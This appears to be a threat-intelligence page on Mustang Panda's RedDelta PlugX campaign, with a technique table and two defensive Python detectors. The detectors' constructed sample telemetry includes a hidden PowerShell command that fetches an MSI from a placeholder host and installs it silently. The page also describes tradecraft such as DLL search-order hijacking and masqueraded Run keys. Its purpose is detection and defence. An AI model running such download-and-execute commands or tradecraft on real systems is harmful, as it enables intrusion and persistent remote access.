C0047: RedDelta Modified PlugX Infection Chain Operations
RedDelta Modified PlugX Infection Chain Operations was executed by Mustang Panda from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia. RedDelta Modified PlugX Infection Chain Operations involved phishing to deliver malicious files or links to users prompting follow-on installer downloads to load PlugX on victim machines in a persistent state.[1]
Analyst context for executives and security teams
This campaign matters because it combines targeted phishing with follow-on downloads, persistence, and remote access tooling such as PlugX, with relationships to ShadowPad and multiple stealth and command-and-control techniques. For leaders, the practical issue is not only “malware delivery,” but whether the organization can prove that email, endpoint, identity, and network controls would expose a user-driven infection chain before it becomes persistent remote access.
Executive priority
Prioritize this as a resilience and readiness test for organizations with exposure to targeted phishing risk, especially those with users handling sensitive government, diplomatic, NGO, research, or regional business matters reflected in the ATT&CK description and related group context. Executives should ask whether security teams can show evidence for phishing prevention, suspicious installer execution, persistence creation, signed or masqueraded binaries, and outbound C2 monitoring, rather than relying on awareness training alone.
Technical view
ATT&CK does not provide campaign-specific detection text, so defenders should validate coverage from the related behaviors: spearphishing attachments and links, user execution of malicious files or links, possible client-side exploitation, PowerShell execution, abuse of msiexec.exe and mmc.exe, DLL abuse, hidden files, encrypted or encoded payloads, masqueraded tasks or services, registry run keys or startup folder persistence, execution guardrails, code signing abuse, system information discovery, and web or non-application-layer C2 including proxy use. The related PlugX and ShadowPad software entries support a strong focus on Windows endpoint visibility, while phishing-link relationships also make email, Office suite, and identity-provider telemetry relevant.
Likely telemetry
- Email security logs for attachments, embedded links, sender metadata, and user click events
- Web proxy, DNS, and secure web gateway logs for follow-on downloads and newly observed or suspicious domains
- Endpoint process creation telemetry for PowerShell, msiexec.exe, mmc.exe, installer activity, and unusual parent-child process chains
- Windows registry and startup folder monitoring for persistence via Run keys or startup locations
- Service, scheduled task, and system management logs for masqueraded task or service creation
Detection direction
- Map detections to the full chain instead of a single indicator: phishing delivery, user execution, installer or LOLBin execution, payload staging, persistence, discovery, and C2.
- Tune for suspicious use of legitimate Windows components such as PowerShell, msiexec.exe, and mmc.exe, with attention to command line, parent process, network access, and unusual file paths to reduce false positives.
- Baseline legitimate services, scheduled tasks, startup entries, signed software, and administrative console usage so masquerading and code-signing abuse are reviewable rather than automatically trusted.
- Correlate email or web-click events with endpoint execution and outbound network activity; isolated alerts may look low severity until linked as an infection chain.
- Expect blind spots where endpoint command-line logging, registry auditing, DLL load visibility, proxy logs, DNS logs, or identity-provider click telemetry are missing or not retained.
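The correlation point above, as an added example that is not from the ATT&CK page or the Recorded Future report: it classifies generic EDR-style process-creation records into the stages the page describes (an MSC opened by `mmc.exe` from a user-writable path, a PowerShell child, `msiexec.exe` installing a downloaded MSI) and only alerts when two or more stages line up on one host inside a time window. The sample events, hostnames, PIDs, paths, the `example.invalid` URL and the field names (`ts`, `host`, `pid`, `ppid`, `image`, `cmdline`) are all constructed assumptions.

```python
"""Correlate process-creation events into a multi-stage infection chain."""
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Optional

# Constructed sample telemetry; none of these hosts, PIDs, paths or URLs are real.
EVENTS = [
    {"ts": "2024-09-03T08:15:02", "host": "WS01", "pid": 4100, "ppid": 900,
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r'mmc.exe "C:\Users\alice\Downloads\agenda.msc"'},
    {"ts": "2024-09-03T08:15:05", "host": "WS01", "pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"iwr http://staging.example.invalid/update.msi"
                " -OutFile $env:TEMP\\update.msi; msiexec /i $env:TEMP\\update.msi /qn\""},
    {"ts": "2024-09-03T08:15:09", "host": "WS01", "pid": 4150, "ppid": 4120,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\AppData\Local\Temp\update.msi /qn"},
    # Benign: an administrator opens Event Viewer; nothing follows.
    {"ts": "2024-09-03T09:00:00", "host": "WS02", "pid": 5000, "ppid": 800,
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"mmc.exe C:\Windows\System32\eventvwr.msc"},
    # Benign: software deployment installs from the management agent cache.
    {"ts": "2024-09-03T09:05:00", "host": "WS02", "pid": 5050, "ppid": 700,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Windows\ccmcache\a1\setup.msi /qn"},
]

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\", "\\programdata\\")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")


def _basename(image: str) -> str:
    return ntpath.basename(image).lower()


def _user_writable(text: str) -> bool:
    return any(marker in text.lower() for marker in USER_WRITABLE)


def stage_of(event: dict, parent: Optional[dict]) -> Optional[str]:
    """Classify one process event as a chain stage, or None if it looks ordinary."""
    image = _basename(event["image"])
    cmd = event["cmdline"].lower()
    parent_image = _basename(parent["image"]) if parent else ""
    # T1218.014: mmc.exe opening a console file from a user-writable location
    if image == "mmc.exe" and ".msc" in cmd and _user_writable(cmd):
        return "msc_from_user_path"
    # T1059.001: a script host spawned by mmc.exe, or by explorer.exe (an LNK
    # double-click) with a hidden window or an encoded command
    if image in SCRIPT_HOSTS and (
        parent_image == "mmc.exe"
        or (parent_image == "explorer.exe" and ("-w hidden" in cmd or "-enc" in cmd))
    ):
        return "script_from_lolbin"
    # T1218.007: msiexec driven by a script host, or installing from a URL or
    # a user-writable path
    if image == "msiexec.exe" and (
        parent_image in SCRIPT_HOSTS or "http" in cmd or _user_writable(cmd)
    ):
        return "msiexec_payload"
    return None


def detect_chains(events, window_minutes: int = 10):
    """Return one alert per host where >= 2 distinct stages occur within the window."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    per_host = defaultdict(list)
    for e in sorted(events, key=lambda x: x["ts"]):
        stage = stage_of(e, by_key.get((e["host"], e["ppid"])))
        if stage:
            per_host[e["host"]].append((datetime.fromisoformat(e["ts"]), stage, e["pid"]))
    alerts = []
    for host, hits in per_host.items():
        i = 0
        while i < len(hits):  # group hits that fall within the window of the first one
            start = hits[i][0]
            group = [h for h in hits[i:] if h[0] - start <= timedelta(minutes=window_minutes)]
            stages = sorted({s for _, s, _ in group})
            if len(stages) >= 2:
                alerts.append({"host": host, "first_seen": start.isoformat(),
                               "stages": stages, "pids": [p for _, _, p in group]})
            i += len(group)
    return alerts


if __name__ == "__main__":
    for alert in detect_chains(EVENTS):
        print(alert)
```

Each stage on its own is noisy (administrators open MSC files, and deployment tools run `msiexec` constantly), which is why the function scores the combination rather than any single event; in production the window and the trusted-path list are the two knobs to tune against your own baseline.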
Mitigation priorities
- Strengthen phishing controls first: attachment and link inspection, detonation where available, user reporting workflows, and rapid containment of clicked links or opened files.
- Harden endpoint execution paths by controlling script execution, monitoring or restricting suspicious use of msiexec.exe and mmc.exe, and reviewing policies for unsigned, newly signed, or unusual binaries.
- Validate persistence controls around Run keys, startup folders, services, scheduled tasks, and hidden file locations.
- Maintain patching and exposure management for client applications because the related behaviors include exploitation for client execution.
- Improve egress control and monitoring for web-protocol C2, proxy use, suspicious domains, and unusual non-application-layer communications.
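The Run-key validation point above, as an added example that is not from the ATT&CK page or the Recorded Future report: it scores exported Run-key entries against the traits the technique table lists for this campaign (a vendor-sounding value name such as `OneNote Update`, a launcher outside the normal program directories, DLLs sitting beside it as search-order hijack candidates, a hidden directory, and high-entropy files that look like encrypted payloads). The entry layout, the hypothetical `launcher.exe` name and the sample directory contents are constructed assumptions.

```python
"""Score Run-key persistence entries for masqueraded, side-loaded launchers."""
import math
import ntpath
import random
from collections import Counter

TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")
VENDOR_WORDS = ("microsoft", "onenote", "office", "google", "adobe")
ENTROPY_THRESHOLD = 7.0  # bits per byte; encrypted or compressed data sits near 8


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def executable_from_command(command: str) -> str:
    """Extract the program path from Run-key value data, quoted or unquoted."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ", 1)[0]


def assess_run_entry(entry: dict) -> dict:
    exe = executable_from_command(entry["command"])
    exe_dir = ntpath.dirname(exe).lower() + "\\"
    name = entry["name"].lower()
    findings = []
    if not exe_dir.startswith(TRUSTED_ROOTS):
        findings.append("launcher lives outside Program Files / Windows")
    if entry["dir_hidden"]:
        findings.append("launcher directory is hidden")
    if any(w in name for w in VENDOR_WORDS) and not any(w in exe.lower() for w in VENDOR_WORDS):
        findings.append("value name implies a vendor product that the path does not match")
    dlls = sorted(f for f in entry["files"] if f.lower().endswith(".dll"))
    if dlls:
        findings.append("DLLs beside the launcher (search-order hijack candidates): " + ", ".join(dlls))
    for fname, data in entry["files"].items():
        if not fname.lower().endswith((".exe", ".dll")) and len(data) >= 256:
            ent = shannon_entropy(data)
            if ent > ENTROPY_THRESHOLD:
                findings.append(f"high-entropy blob {fname} ({ent:.2f} bits/byte)")
    # A single trait is common in legitimate software; three or more together is not.
    return {"name": entry["name"], "exe": exe, "findings": findings,
            "suspicious": len(findings) >= 3}


def audit_run_entries(entries):
    return [assess_run_entry(e) for e in entries]


# Constructed sample: a Run-key export joined with the launcher directory listing.
_rng = random.Random(7)
ENCRYPTED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for an encrypted payload
SAMPLE_RUN_ENTRIES = [
    {"name": "OneNote Update",
     "command": r'"C:\Users\alice\AppData\Roaming\NoteSync\launcher.exe"',
     "dir_hidden": True,
     "files": {"launcher.exe": b"MZ" + b"\x00" * 512,
               "helper.dll": b"MZ" + b"\x00" * 512,
               "cache.dat": ENCRYPTED_BLOB}},
    {"name": "OneDrive",
     "command": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
     "dir_hidden": False,
     "files": {"OneDrive.exe": b"MZ" + b"\x00" * 512,
               "settings.json": b'{"updates": "auto"}' * 40}},
]

if __name__ == "__main__":
    for result in audit_run_entries(SAMPLE_RUN_ENTRIES):
        print(result["name"], "->", "SUSPICIOUS" if result["suspicious"] else "ok", result["findings"])
```

On a live host the `dir_hidden` flag would come from the directory's attributes and `files` from a listing of the launcher's folder; the scoring deliberately treats side-by-side DLLs as only one signal, since many legitimate installs ship DLLs next to their executable.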
Analyst notes and limits
The supplied ATT&CK object identifies a campaign conducted from mid-2023 through the end of 2024 against multiple entities in East and Southeast Asia, attributed through ATT&CK relationship context to Mustang Panda, and involving phishing that delivered malicious files or links prompting installer downloads to load PlugX persistently. Related techniques provide useful defensive planning coverage even though ATT&CK does not include campaign-specific detection guidance.
Official detection is not provided, object-level platforms and tactics are not specified, and no indicators of compromise are included in the supplied fields. Local risk depends on the organization’s geography, sector, user population, telemetry retention, endpoint coverage, and exposure to the phishing and Windows execution patterns represented by the related techniques and software.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.001 | PowerShell | Mustang Panda used LNK files to execute PowerShell commands leading to eventual PlugX installation during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1071.001 | Web Protocols | Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1553.002 | Code Signing | Mustang Panda used legitimate, signed binaries such as `inkform.exe` or `ExcelRepairToolboxLauncher.exe` for follow-on execution of malicious DLLs through DLL search order hijacking in RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1090 | Proxy | Mustang Panda proxied communication through the Cloudflare CDN service during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1608.001 | Upload Malware | Mustang Panda staged malware on adversary-controlled domains and cloud storage instances during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1574.001 | DLL | Mustang Panda used DLL search order hijacking on vulnerable applications to install PlugX payloads during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1095 | Non-Application Layer Protocol | Mustang Panda communicated over TCP 5000 from adversary administrative servers to adversary command and control nodes during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1480 | Execution Guardrails | Mustang Panda included the use of Cloudflare geofencing mechanisms to limit payload download activity during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1082 | System Information Discovery | Mustang Panda captured victim operating system type via User Agent analysis during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | Mustang Panda used Run registry keys with names such as `OneNote Update` to execute legitimate executables that would load malicious DLLs through search-order hijacking to ensure persistence during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1203 | Exploitation for Client Execution | Mustang Panda used the GrimResource exploitation technique via specially crafted MSC files for arbitrary code execution during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1566.002 | Spearphishing Link | Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1027.013 | Encrypted/Encoded File | Mustang Panda stored installation payloads as encrypted files in hidden folders during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1566.001 | Spearphishing Attachment | Mustang Panda leveraged malicious attachments in spearphishing emails for initial access to victim environments in RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1204.002 | Malicious File | Mustang Panda distributed malicious LNK objects for user execution during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1036.004 | Masquerade Task or Service | Mustang Panda masqueraded Registry run keys as legitimate-looking service names such as `OneNote Update` during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1564.001 | Hidden Files and Directories | Mustang Panda stored encrypted payloads associated with PlugX installation in hidden directories during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1588.004 | Digital Certificates | Mustang Panda acquired Cloudflare Origin CA TLS certificates during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1218.007 | Msiexec | Mustang Panda initial payloads downloaded a Windows Installer MSI file that in turn dropped follow-on files leading to installation of PlugX during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1583.001 | Domains | Mustang Panda registered adversary-controlled domains during RedDelta Modified PlugX Infection Chain Operations that were re-registrations of expired domains.[1] |
| Enterprise | T1218.014 | MMC | Mustang Panda used Microsoft Management Console Snap-In Control files, or MSC files, executed via MMC to run follow-on PowerShell commands during RedDelta Modified PlugX Infection Chain Operations.[1] |
| Enterprise | T1204.001 | Malicious Link | Mustang Panda distributed hyperlinks that would result in an MSC file running a PowerShell command to download and install a remotely-hosted MSI file during RedDelta Modified PlugX Infection Chain Operations.[1] |
Groups, software, and campaigns
G0129: Mustang Panda
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. [1][2][3][4][5][6][7][8][9][10][11][12][13]
S0596: ShadowPad
S0013: PlugX
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | f8608e36216a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Recorded Future RedDelta 2025: Insikt Group. (2025, January 9). Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain. Retrieved January 14, 2025.
[2] mitre-attack C0047: MITRE ATT&CK campaign object C0047.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.